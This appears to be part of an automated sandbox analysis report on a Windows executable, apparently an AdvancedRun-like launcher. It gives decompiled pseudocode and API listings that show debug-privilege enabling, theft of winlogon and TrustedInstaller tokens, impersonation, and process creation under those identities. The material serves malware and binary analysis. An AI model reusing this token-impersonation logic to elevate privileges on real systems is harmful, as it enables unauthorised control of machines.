                                                                                                                                                                                                                          				intOrPtr _t95;
                                                                                                                                                                                                                          				int _t106;
                                                                                                                                                                                                                          				char* _t110;
                                                                                                                                                                                                                          				intOrPtr _t115;
                                                                                                                                                                                                                          				wchar_t* _t117;
                                                                                                                                                                                                                          				intOrPtr _t124;
                                                                                                                                                                                                                          				wchar_t* _t125;
                                                                                                                                                                                                                          				intOrPtr _t131;
                                                                                                                                                                                                                          				wchar_t* _t132;
                                                                                                                                                                                                                          				int _t154;
                                                                                                                                                                                                                          				int _t156;
                                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                                          				intOrPtr _t162;
                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                          				void* _t178;
                                                                                                                                                                                                                          				void* _t179;
                                                                                                                                                                                                                          				intOrPtr _t181;
                                                                                                                                                                                                                          				int _t187;
                                                                                                                                                                                                                          				intOrPtr _t188;
                                                                                                                                                                                                                          				intOrPtr _t190;
                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                          				signed int _t205;
                                                                                                                                                                                                                          				signed int _t206;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t179 = __edx;
                                                                                                                                                                                                                          				_t158 = __ecx;
                                                                                                                                                                                                                          				_t206 = _t205 & 0xfffffff8;
                                                                                                                                                                                                                          				E0040B550(0x1ccc, __ecx);
                                                                                                                                                                                                                          				_t76 = E0040313D(_t158);
                                                                                                                                                                                                                          				if(_t76 != 0) {
                                                                                                                                                                                                                          					E0040AC52();
                                                                                                                                                                                                                          					SetErrorMode(0x8001); // executed
                                                                                                                                                                                                                          					_t156 = 0;
                                                                                                                                                                                                                          					 *0x40fa70 = 0x11223344;
                                                                                                                                                                                                                          					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                                                                                                                                          					_t82 = E00405497( &_a8);
                                                                                                                                                                                                                          					_a48 = 0x20;
                                                                                                                                                                                                                          					_a40 = 0;
                                                                                                                                                                                                                          					_a52 = 0;
                                                                                                                                                                                                                          					_a44 = 0;
                                                                                                                                                                                                                          					_a56 = 0;
                                                                                                                                                                                                                          					E004056B5(_t158, __eflags, _t82, _a12); // executed
                                                                                                                                                                                                                          					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                                                                                                                                          					 *_t206 = L"/SpecialRun";
                                                                                                                                                                                                                          					_t85 = E0040585C( &_v0);
                                                                                                                                                                                                                          					__eflags = _t85;
                                                                                                                                                                                                                          					if(_t85 != 0) {
                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                          						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                                                                                                                                          						__eflags = _t86 - _t156;
                                                                                                                                                                                                                          						if(_t86 < _t156) {
                                                                                                                                                                                                                          							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                                                                                                                                          							__eflags = _t87 - _t156;
                                                                                                                                                                                                                          							if(_t87 >= _t156) {
                                                                                                                                                                                                                          								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          								_t41 = _t87 + 1; // 0x1
                                                                                                                                                                                                                          								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                                                                                                                                          								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                                                                                                                                          								__eflags = _t117;
                                                                                                                                                                                                                          								if(_t117 == 0) {
                                                                                                                                                                                                                          									_a92 = _t156;
                                                                                                                                                                                                                          									memset( &_a94, _t156, 0x208);
                                                                                                                                                                                                                          									_a620 = _t156;
                                                                                                                                                                                                                          									memset( &_a622, _t156, 0x208);
                                                                                                                                                                                                                          									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                                                                                                                                          									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									_t125 = _t124 + 0x5504;
                                                                                                                                                                                                                          									_v4 = _t125;
                                                                                                                                                                                                                          									_t187 = wcslen(_t125);
                                                                                                                                                                                                                          									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                                                                                                                                          									__eflags = _t187 + _t51 - 0x104;
                                                                                                                                                                                                                          									if(_t187 + _t51 >= 0x104) {
                                                                                                                                                                                                                          										_a620 = _t156;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									_t132 = _t131 + 0x5504;
                                                                                                                                                                                                                          									__eflags = _t132;
                                                                                                                                                                                                                          									wcscpy(_t132,  &_a620);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E00402F31(_t156);
                                                                                                                                                                                                                          							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          							_pop(_t159);
                                                                                                                                                                                                                          							_a84 =  &_a8;
                                                                                                                                                                                                                          							_a76 = 0x40cb0c;
                                                                                                                                                                                                                          							_a88 = _t156;
                                                                                                                                                                                                                          							_a80 = _t156;
                                                                                                                                                                                                                          							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                                                                                                                                          							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                                                                                                                                          							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                                                                                                                                          								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                                                                                                                                          								__eflags = _t93;
                                                                                                                                                                                                                          								if(_t93 < 0) {
                                                                                                                                                                                                                          									E00406420();
                                                                                                                                                                                                                          									__imp__CoInitialize(_t156);
                                                                                                                                                                                                                          									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                                                                                                                                          									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                                                                                                                                          									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                                                                                                                                          									E00402F31(1);
                                                                                                                                                                                                                          									__imp__CoUninitialize();
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									E004065BE(_t159);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                                                                                                                                          								_a7356 = _t156;
                                                                                                                                                                                                                          								_a7352 = _t156;
                                                                                                                                                                                                                          								_a7340 = _t156;
                                                                                                                                                                                                                          								_a7344 = _t156;
                                                                                                                                                                                                                          								_a7348 = _t156;
                                                                                                                                                                                                                          								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                                                                                                                                          								_t110 =  &_a5288;
                                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                                          								E004035FB(_t110);
                                                                                                                                                                                                                          								L7:
                                                                                                                                                                                                                          								E004054B9( &_v0);
                                                                                                                                                                                                                          								E004099D4( &_a32);
                                                                                                                                                                                                                          								E004054B9( &_v0);
                                                                                                                                                                                                                          								_t106 = _t156;
                                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t26 = _t86 + 1; // 0x1
                                                                                                                                                                                                                          						_t173 = _t26;
                                                                                                                                                                                                                          						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                          							E00402F31(_t156);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							E00402FC6(_t173, __eflags, _t138);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          						_a68 =  &_a8;
                                                                                                                                                                                                                          						_a60 = 0x40cb0c;
                                                                                                                                                                                                                          						_a72 = _t156;
                                                                                                                                                                                                                          						_a64 = _t156;
                                                                                                                                                                                                                          						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                                                                                                                                          						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          						_a5280 = _t156;
                                                                                                                                                                                                                          						_a5276 = _t156;
                                                                                                                                                                                                                          						_a5264 = _t156;
                                                                                                                                                                                                                          						_a5268 = _t156;
                                                                                                                                                                                                                          						_a5272 = _t156;
                                                                                                                                                                                                                          						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                                                                                                                                          						_t110 =  &_a3212;
                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					__eflags = _a56 - 3;
                                                                                                                                                                                                                          					if(_a56 != 3) {
                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					__eflags = 1;
                                                                                                                                                                                                                          					_a3212 = 0;
                                                                                                                                                                                                                          					_a3208 = 0;
                                                                                                                                                                                                                          					_a3196 = 0;
                                                                                                                                                                                                                          					_a3200 = 0;
                                                                                                                                                                                                                          					_a3204 = 0;
                                                                                                                                                                                                                          					_v4 = 0;
                                                                                                                                                                                                                          					_v0 = 0;
                                                                                                                                                                                                                          					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                                                                                                                                          					_t177 = 2;
                                                                                                                                                                                                                          					_push(E0040584C( &_v0, _t177));
                                                                                                                                                                                                                          					L0040B1F8();
                                                                                                                                                                                                                          					_pop(_t178);
                                                                                                                                                                                                                          					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
                                                                                                                                                                                                                          					_t156 = _t154;
                                                                                                                                                                                                                          					_t110 =  &_a1132;
                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t106 = _t76 + 1;
                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                          					return _t106;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}





































                                                                                                                                                                                                                          0x00408620
                                                                                                                                                                                                                          0x0040862a
                                                                                                                                                                                                                          0x00408632
                                                                                                                                                                                                                          0x00408633
                                                                                                                                                                                                                          0x00408638
                                                                                                                                                                                                                          0x0040864a
                                                                                                                                                                                                                          0x0040864f
                                                                                                                                                                                                                          0x00408651
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040854f
                                                                                                                                                                                                                          0x0040854f
                                                                                                                                                                                                                          0x00408550
                                                                                                                                                                                                                          0x00408556
                                                                                                                                                                                                                          0x00408556

APIs
  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
• GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
• EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
• swscanf.MSVCRT ref: 00408620
• _wtoi.MSVCRT ref: 00408633
Strings
Memory Dump Source
• Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
• String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
• API String ID: 3933224404-3784219877
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                          				wchar_t* _v16;
                                                                                                                                                                                                                          				void _v546;
                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                          				void _v1074;
                                                                                                                                                                                                                          				char _v1076;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				long _t84;
                                                                                                                                                                                                                          				int _t87;
                                                                                                                                                                                                                          				wchar_t* _t88;
                                                                                                                                                                                                                          				int _t92;
                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                          				int _t94;
                                                                                                                                                                                                                          				int _t96;
                                                                                                                                                                                                                          				int _t99;
                                                                                                                                                                                                                          				int _t104;
                                                                                                                                                                                                                          				long _t105;
                                                                                                                                                                                                                          				int _t110;
                                                                                                                                                                                                                          				void** _t112;
                                                                                                                                                                                                                          				int _t113;
                                                                                                                                                                                                                          				intOrPtr _t131;
                                                                                                                                                                                                                          				wchar_t* _t132;
                                                                                                                                                                                                                          				int* _t148;
                                                                                                                                                                                                                          				wchar_t* _t149;
                                                                                                                                                                                                                          				int _t151;
                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                          				int _t154;
                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                          				long _t160;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t145 = __edx;
                                                                                                                                                                                                                          				_t152 = __ecx;
                                                                                                                                                                                                                          				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				if(_t131 != 4) {
                                                                                                                                                                                                                          					__eflags = _t131 - 5;
                                                                                                                                                                                                                          					if(_t131 != 5) {
                                                                                                                                                                                                                          						__eflags = _t131 - 9;
                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                          							__eflags = _t131 - 8;
                                                                                                                                                                                                                          							if(_t131 != 8) {
                                                                                                                                                                                                                          								__eflags = _t131 - 6;
                                                                                                                                                                                                                          								if(_t131 != 6) {
                                                                                                                                                                                                                          									__eflags = _t131 - 7;
                                                                                                                                                                                                                          									if(_t131 != 7) {
                                                                                                                                                                                                                          										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          										_t132 = __eax + 0x46b6;
                                                                                                                                                                                                                          										_t148 = __eax + 0x48b6;
                                                                                                                                                                                                                          										__eflags =  *_t148;
                                                                                                                                                                                                                          										_v16 = _t132;
                                                                                                                                                                                                                          										_v8 = __eax + 0x4ab6;
                                                                                                                                                                                                                          										if( *_t148 == 0) {
                                                                                                                                                                                                                          											_t88 = wcschr(_t132, 0x40);
                                                                                                                                                                                                                          											__eflags = _t88;
                                                                                                                                                                                                                          											if(_t88 != 0) {
                                                                                                                                                                                                                          												_t148 = 0;
                                                                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										_t153 = _t152 + 0x800;
                                                                                                                                                                                                                          										E0040289F(_t153);
                                                                                                                                                                                                                          										_t154 =  *(_t153 + 0xc);
                                                                                                                                                                                                                          										__eflags = _t154;
                                                                                                                                                                                                                          										if(_t154 == 0) {
                                                                                                                                                                                                                          											_t87 = 0;
                                                                                                                                                                                                                          											__eflags = 0;
                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                          											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                          										__eflags = _t87;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                          										_t84 = GetLastError();
                                                                                                                                                                                                                          										L43:
                                                                                                                                                                                                                          										_v12 = _t84;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									goto L44;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								__eflags = E00401D99(__eax + 0x44ac, __edx);
                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                          									goto L44;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                                          								__eflags = _t92;
                                                                                                                                                                                                                          								if(_t92 != 0) {
                                                                                                                                                                                                                          									goto L44;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t84 = _a28;
                                                                                                                                                                                                                          								goto L43;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
                                                                                                                                                                                                                          							__eflags = _t93;
                                                                                                                                                                                                                          							if(_t93 != 0) {
                                                                                                                                                                                                                          								E00401306(_t93); // executed
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                          							_t94 = E00401F04(_t145, _t152); // executed
                                                                                                                                                                                                                          							__eflags = _t94;
                                                                                                                                                                                                                          							_v12 = _t94;
                                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                                          								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
                                                                                                                                                                                                                          								__eflags = _t96;
                                                                                                                                                                                                                          								_v12 = _t96;
                                                                                                                                                                                                                          								if(_t96 == 0) {
                                                                                                                                                                                                                          									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                                                                                                                                                                          									__eflags = _t99;
                                                                                                                                                                                                                          									if(_t99 == 0) {
                                                                                                                                                                                                                          										_v12 = GetLastError();
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									CloseHandle(_v8); // executed
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								RevertToSelf(); // executed
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
                                                                                                                                                                                                                          						__eflags = _t104;
                                                                                                                                                                                                                          						if(_t104 == 0) {
                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                          						_t105 = E00401E44(_t152, _t104,  &_v8);
                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t149 = __eax + 0x44ac;
                                                                                                                                                                                                                          					_t110 = wcslen(_t149);
                                                                                                                                                                                                                          					__eflags = _t110;
                                                                                                                                                                                                                          					if(_t110 <= 0) {
                                                                                                                                                                                                                          						goto L44;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                          						__eflags = E00404EA9(_t149, _t110);
                                                                                                                                                                                                                          						_t112 =  &_v8;
                                                                                                                                                                                                                          						_push(_t112);
                                                                                                                                                                                                                          						_push(_t149);
                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                          							_push(_t152);
                                                                                                                                                                                                                          							_t113 = E00401DF9(_t145, __eflags);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_push(_t112);
                                                                                                                                                                                                                          							_push(_t152);
                                                                                                                                                                                                                          							_t113 = E00401E44();
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v12 = _t113;
                                                                                                                                                                                                                          						__eflags = _t113;
                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v548 = 0;
                                                                                                                                                                                                                          					memset( &_v546, 0, 0x208);
                                                                                                                                                                                                                          					_v1076 = 0;
                                                                                                                                                                                                                          					memset( &_v1074, 0, 0x208);
                                                                                                                                                                                                                          					E00404C3C( &_v548);
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                                                                                                                                                          					_t151 = wcslen(??);
                                                                                                                                                                                                                          					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                                                                                                                                                          					_t159 = _t151 + _t10 - 0x104;
                                                                                                                                                                                                                          					if(_t151 + _t10 >= 0x104) {
                                                                                                                                                                                                                          						_v1076 = 0;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                          					_t160 = _t105;
                                                                                                                                                                                                                          					_v12 = _t105;
                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                          					if(_t160 == 0) {
                                                                                                                                                                                                                          						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                                                                                                                                                          							_v12 = GetLastError();
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						CloseHandle(_v8);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					L44:
                                                                                                                                                                                                                          					return _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          0x00402278
                                                                                                                                                                                                                          0x00402296
                                                                                                                                                                                                                          0x00402296
                                                                                                                                                                                                                          0x0040229c
                                                                                                                                                                                                                          0x0040229c
                                                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                                                          0x004022c2
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                                                          0x00402201
                                                                                                                                                                                                                          0x00402203
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402220
                                                                                                                                                                                                                          0x00402225
                                                                                                                                                                                                                          0x00402227
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00402173
                                                                                                                                                                                                                          0x00402179
                                                                                                                                                                                                                          0x0040217b
                                                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                                                          0x00402183
                                                                                                                                                                                                                          0x00402185
                                                                                                                                                                                                                          0x00402188
                                                                                                                                                                                                                          0x0040218d
                                                                                                                                                                                                                          0x0040218f
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004021a2
                                                                                                                                                                                                                          0x004021a7
                                                                                                                                                                                                                          0x004021a9
                                                                                                                                                                                                                          0x004021ac
                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                                                          0x004021d3
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004020fe
                                                                                                                                                                                                                          0x00402103
                                                                                                                                                                                                                          0x00402105
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402111
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x004020ad
                                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                                          0x004020b9
                                                                                                                                                                                                                          0x004020bc
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020c2
                                                                                                                                                                                                                          0x004020c4
                                                                                                                                                                                                                          0x004020ce
                                                                                                                                                                                                                          0x004020d0
                                                                                                                                                                                                                          0x004020d3
                                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                                          0x004020d5
                                                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                                                          0x004020e7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020dd
                                                                                                                                                                                                                          0x004020de
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020ec
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00402008
                                                                                                                                                                                                                          0x00402016
                                                                                                                                                                                                                          0x0040201d
                                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                                          0x00402035
                                                                                                                                                                                                                          0x00402044
                                                                                                                                                                                                                          0x00402049
                                                                                                                                                                                                                          0x00402055
                                                                                                                                                                                                                          0x00402064
                                                                                                                                                                                                                          0x00402068
                                                                                                                                                                                                                          0x0040206e
                                                                                                                                                                                                                          0x0040208b
                                                                                                                                                                                                                          0x00402070
                                                                                                                                                                                                                          0x00402082
                                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                                          0x0040209e
                                                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x0040211b
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x00402149
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x004022cb
                                                                                                                                                                                                                          0x004022d2
                                                                                                                                                                                                                          0x004022d2

APIs
• memset.MSVCRT ref: 0040201D
• memset.MSVCRT ref: 00402035
  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
• wcslen.MSVCRT ref: 00402050
• wcslen.MSVCRT ref: 0040205F
• wcslen.MSVCRT ref: 004020B4
• _wtoi.MSVCRT ref: 004020D7
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
• OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
• RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                            • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402259
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
